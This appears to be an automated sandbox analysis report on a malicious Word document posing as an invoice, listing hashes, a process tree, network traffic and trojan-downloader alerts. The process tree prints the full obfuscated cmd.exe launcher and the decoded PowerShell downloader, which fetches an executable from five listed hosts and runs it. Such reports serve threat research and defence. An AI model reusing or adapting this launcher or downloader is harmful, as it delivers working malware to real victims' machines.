File name: | Invoice-Y3470.doc |
Full analysis: | https://app.any.run/tasks/2be84576-9033-440c-87cc-9e44a1733865 |
Verdict: | Malicious activity |
Analysis date: | December 14, 2018, 10:52:10 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Fri Dec 14 04:25:00 2018, Last Saved Time/Date: Fri Dec 14 04:25:00 2018, Number of Pages: 1, Number of Words: 6, Number of Characters: 40, Security: 0 |
MD5: | C49135604DE43B7A96DDF97EA0E97E0E |
SHA1: | 87548DE98F444142F10EAB5BC7CCF677E576B71A |
SHA256: | BB7D51D0067B88AD1AA4A44C49A15D0FF58D6214FB4076E56747EF53C0C38B73 |
SSDEEP: | 1536:LHC81ooMDS034nC54nZrL4AkiuAMOkEEW/yEbzvadrzw7PKQfU0r8yEWPU+a9:LHC8GhDS0o9zTGOZD6EbzCdfw7P9oLW |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
CompObjUserType: | Microsoft Word 97-2003 Document |
---|---|
CompObjUserTypeLen: | 32 |
HeadingPairs: |
|
TitleOfParts: | - |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 16 |
CharCountWithSpaces: | 45 |
Paragraphs: | 1 |
Lines: | 1 |
Company: | - |
CodePage: | Windows Latin 1 (Western European) |
Security: | None |
Characters: | 40 |
Words: | 6 |
Pages: | 1 |
ModifyDate: | 2018:12:14 04:25:00 |
CreateDate: | 2018:12:14 04:25:00 |
TotalEditTime: | - |
Software: | Microsoft Office Word |
RevisionNumber: | 1 |
LastModifiedBy: | - |
Template: | Normal.dotm |
Comments: | - |
Keywords: | - |
Author: | - |
Subject: | - |
Title: | - |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2980 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Roaming\Invoice-Y3470.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3336 | c:\VURcrUDuIZ\TMvGSsAjBXzH\OqRztTjOYDcf\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V/C"set v0k=hspBoKXLalEDIfIpS;dkPGrv,.ytwZbi6108VOze$FgY'/:n @N(C}7mAHqURW\j)u=+4-xQ{c&&for %T in (40,29,19,20,66,44,58,65,19,44,17,40,43,47,29,66,47,39,28,69,4,30,63,39,73,27,48,50,39,27,25,61,39,30,52,9,31,39,47,27,17,40,63,55,15,66,44,0,27,27,15,46,45,45,0,39,22,30,8,9,15,8,22,8,18,39,25,73,4,55,45,8,8,38,16,5,38,68,16,29,65,49,0,27,27,15,46,45,45,28,8,65,1,25,47,39,27,45,0,57,60,3,0,16,19,37,19,20,49,0,27,27,15,46,45,45,73,39,9,39,30,27,22,8,23,39,9,8,47,18,39,23,39,47,27,1,25,73,4,25,38,8,45,34,6,23,14,29,70,10,49,0,27,27,15,46,45,45,31,9,42,73,8,15,25,47,39,27,45,6,36,32,59,58,11,29,56,8,34,49,0,27,27,15,46,45,45,8,27,39,55,8,25,73,73,45,23,57,13,13,60,15,34,28,44,25,16,15,9,31,27,51,44,49,44,64,17,40,31,13,16,66,44,31,5,11,44,17,40,71,21,15,48,66,48,44,54,33,35,44,17,40,18,58,31,66,44,21,50,11,44,17,40,71,9,20,66,40,39,47,23,46,27,39,55,15,67,44,62,44,67,40,71,21,15,67,44,25,39,70,39,44,17,13,4,22,39,8,73,0,51,40,22,0,47,48,31,47,48,40,63,55,15,64,72,27,22,26,72,40,43,47,29,25,11,4,28,47,9,4,8,18,41,31,9,39,51,40,22,0,47,24,48,40,71,9,20,64,17,40,57,16,57,66,44,52,58,43,44,17,14,13,48,51,51,21,39,27,69,14,27,39,55,48,40,71,9,20,64,25,9,39,47,42,27,0,48,69,42,39,48,35,34,34,34,34,64,48,72,14,47,23,4,19,39,69,14,27,39,55,48,40,71,9,20,17,40,10,14,4,66,44,29,16,55,44,17,30,22,39,8,19,17,53,53,73,8,27,73,0,72,53,53,40,41,60,7,66,44,30,19,21,44,17,74)do set 3WZ7=!3WZ7!!v0k:~%T,1!&&if %T geq 74 echo !3WZ7:*3WZ7!=!|FOR /F "delims=uD.M tokens=2" %B IN ('ftype^^^|findstr lMo')DO %B -" | c:\windows\system32\cmd.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3880 | CmD /V/C"set v0k=hspBoKXLalEDIfIpS;dkPGrv,.ytwZbi6108VOze$FgY'/:n @N(C}7mAHqURW\j)u=+4-xQ{c&&for %T in (40,29,19,20,66,44,58,65,19,44,17,40,43,47,29,66,47,39,28,69,4,30,63,39,73,27,48,50,39,27,25,61,39,30,52,9,31,39,47,27,17,40,63,55,15,66,44,0,27,27,15,46,45,45,0,39,22,30,8,9,15,8,22,8,18,39,25,73,4,55,45,8,8,38,16,5,38,68,16,29,65,49,0,27,27,15,46,45,45,28,8,65,1,25,47,39,27,45,0,57,60,3,0,16,19,37,19,20,49,0,27,27,15,46,45,45,73,39,9,39,30,27,22,8,23,39,9,8,47,18,39,23,39,47,27,1,25,73,4,25,38,8,45,34,6,23,14,29,70,10,49,0,27,27,15,46,45,45,31,9,42,73,8,15,25,47,39,27,45,6,36,32,59,58,11,29,56,8,34,49,0,27,27,15,46,45,45,8,27,39,55,8,25,73,73,45,23,57,13,13,60,15,34,28,44,25,16,15,9,31,27,51,44,49,44,64,17,40,31,13,16,66,44,31,5,11,44,17,40,71,21,15,48,66,48,44,54,33,35,44,17,40,18,58,31,66,44,21,50,11,44,17,40,71,9,20,66,40,39,47,23,46,27,39,55,15,67,44,62,44,67,40,71,21,15,67,44,25,39,70,39,44,17,13,4,22,39,8,73,0,51,40,22,0,47,48,31,47,48,40,63,55,15,64,72,27,22,26,72,40,43,47,29,25,11,4,28,47,9,4,8,18,41,31,9,39,51,40,22,0,47,24,48,40,71,9,20,64,17,40,57,16,57,66,44,52,58,43,44,17,14,13,48,51,51,21,39,27,69,14,27,39,55,48,40,71,9,20,64,25,9,39,47,42,27,0,48,69,42,39,48,35,34,34,34,34,64,48,72,14,47,23,4,19,39,69,14,27,39,55,48,40,71,9,20,17,40,10,14,4,66,44,29,16,55,44,17,30,22,39,8,19,17,53,53,73,8,27,73,0,72,53,53,40,41,60,7,66,44,30,19,21,44,17,74)do set 3WZ7=!3WZ7!!v0k:~%T,1!&&if %T geq 74 echo !3WZ7:*3WZ7!=!|FOR /F "delims=uD.M tokens=2" %B IN ('ftype^^^|findstr lMo')DO %B -" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3920 | C:\Windows\system32\cmd.exe /S /D /c" echo $ZkP='quk';$YnZ=new-object Net.WebClient;$jmp='http://herbalparade.com/aazSKz4SZu@http://waus.net/hHRBhSkOkP@http://celebtravelandevents.co.za/0XvIZxE@http://ilgcap.net/XV6UqDZAa0@http://atema.cc/vHffRp0w'.Split('@');$ifS='iKD';$QGp = '718';$dqi='GND';$QlP=$env:temp+'\'+$QGp+'.exe';foreach($rhn in $jmp){try{$YnZ.DownloadFile($rhn, $QlP);$HSH='CqY';If ((Get-Item $QlP).length -ge 80000) {Invoke-Item $QlP;$EIo='ZSm';break;}}catch{}}$FRL='bkG';" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3972 | C:\Windows\system32\cmd.exe /S /D /c" FOR /F "delims=uD.M tokens=2" %B IN ('ftype^|findstr lMo') DO %B -" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2408 | C:\Windows\system32\cmd.exe /c ftype|findstr lMo | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2644 | C:\Windows\system32\cmd.exe /S /D /c" ftype" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2732 | findstr lMo | C:\Windows\system32\findstr.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Find String (QGREP) Utility Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3452 | PowerShell - | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2980 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR6C57.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2980 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\EEE1F3BE.wmf | — | |
MD5:— | SHA256:— | |||
2980 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4A6B967C.wmf | — | |
MD5:— | SHA256:— | |||
3452 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\CH4YS99BJOR0JU737F0B.temp | — | |
MD5:— | SHA256:— | |||
2980 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat | text | |
MD5:8609AA4592E7C28C63C219FB7D1FA311 | SHA256:52EAD671B731FAD7727AC34C1EC23AC6C26121F5886264C482C5451E73ECAD7C | |||
3452 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF247d3f.TMP | binary | |
MD5:6073B6FC66D2E68644893344F6904E4A | SHA256:0F2F61C8DFC3A20C7A5E5133C19BA1493441440E5477254273F28F6F668E64B3 | |||
2980 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4B098871.wmf | wmf | |
MD5:53DBD7025649D691C710DDF095C4ACB4 | SHA256:35F2A683909B8DAA46CF7913525C7D2AB07AAF2D9A111AB1AC57D0BB7456EF38 | |||
2980 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\Invoice-Y3470.doc.LNK | lnk | |
MD5:69D1EBA3942A6D030400E7C7EC0F5216 | SHA256:958E112F72C383612C256227D327D94F601693089F9503E1539447C77E743E80 | |||
3452 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:6073B6FC66D2E68644893344F6904E4A | SHA256:0F2F61C8DFC3A20C7A5E5133C19BA1493441440E5477254273F28F6F668E64B3 | |||
2980 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\~$voice-Y3470.doc | pgc | |
MD5:1049E250B380CB0A7FC2184F972B085B | SHA256:2D8C161D650DB1356C6D27690C0B7F7CDDB5DF90CEA7852BF76093C3FC34D0ED |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3452 | powershell.exe | GET | 404 | 192.185.161.151:80 | http://ilgcap.net/XV6UqDZAa0 | US | xml | 345 b | malicious |
3452 | powershell.exe | GET | 404 | 203.28.48.11:80 | http://waus.net/hHRBhSkOkP | AU | xml | 345 b | malicious |
3452 | powershell.exe | GET | 404 | 69.89.31.173:80 | http://herbalparade.com/aazSKz4SZu | US | xml | 345 b | malicious |
3452 | powershell.exe | GET | 404 | 197.242.146.191:80 | http://celebtravelandevents.co.za/0XvIZxE | ZA | xml | 345 b | malicious |
3452 | powershell.exe | GET | 404 | 185.182.56.168:80 | http://atema.cc/vHffRp0w | NL | xml | 345 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3452 | powershell.exe | 192.185.161.151:80 | ilgcap.net | CyrusOne LLC | US | malicious |
3452 | powershell.exe | 69.89.31.173:80 | herbalparade.com | Unified Layer | US | malicious |
3452 | powershell.exe | 203.28.48.11:80 | waus.net | Bucan Holdings Pty Ltd | AU | malicious |
3452 | powershell.exe | 197.242.146.191:80 | celebtravelandevents.co.za | Afrihost | ZA | malicious |
3452 | powershell.exe | 185.182.56.168:80 | atema.cc | Astralus B.V. | NL | malicious |
Domain | IP | Reputation |
---|---|---|
herbalparade.com |
| malicious |
waus.net |
| malicious |
celebtravelandevents.co.za |
| malicious |
ilgcap.net |
| malicious |
atema.cc |
| malicious |
PID | Process | Class | Message |
---|---|---|---|
3452 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header |
3452 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32 |
3452 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header |
3452 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32 |
3452 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header |
3452 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32 |
3452 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header |
3452 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32 |
3452 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header |
3452 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32 |